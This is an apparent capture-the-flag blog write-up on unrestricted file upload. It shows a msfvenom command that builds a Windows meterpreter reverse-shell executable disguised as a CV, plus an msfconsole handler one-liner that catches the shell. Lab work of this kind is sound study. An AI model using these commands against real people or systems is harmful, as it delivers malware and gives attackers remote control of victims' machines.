15 Dec 2022
Secure Coding Santa is looking for a SidekickAnother security concern for web apps is insufficient input validation. Occurs when user-provided input is inherently trusted by the application. I think I know where this is going. SQL Injection, Cross Site Scripting, and Unrestricted File Upload stem from this issue. UFU can allow an attakcer to host and/or serve illegal content or leak sensitive information. Usually has two main paths:
Even storing uploaded files outside the web root could pose a danger through local file inclusion vulns that could force the seb server itself to recover the file, allowing for RCE.
Since people will be looking at the files uploaded, and there’s no restrictions on the file type uploaded, the people can be targeted with malware embedded files.
Gain flag from particular user’s documents directory.
In this case, create a CV with a mlicious macro embedded using Metasploit. msfvenom -p windows/x64/meterpreter.reverse_tcp LHOST=tun0 LPORT="Listening port" -f exe -o cv-username.exe where tun0 is the listening (own) IP address and “Listening port” is random port number chosen to listen on.
Setup listener with sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 'listening port'; exploit" where tun0 and ‘listening port’ are same as previous step.
Once person interacts folder the reverse shell is launched and digging around can commence.
Flag captured, all questions answered. Even though several answers are just in the text, I might come back later to list methods of protection after the event is over.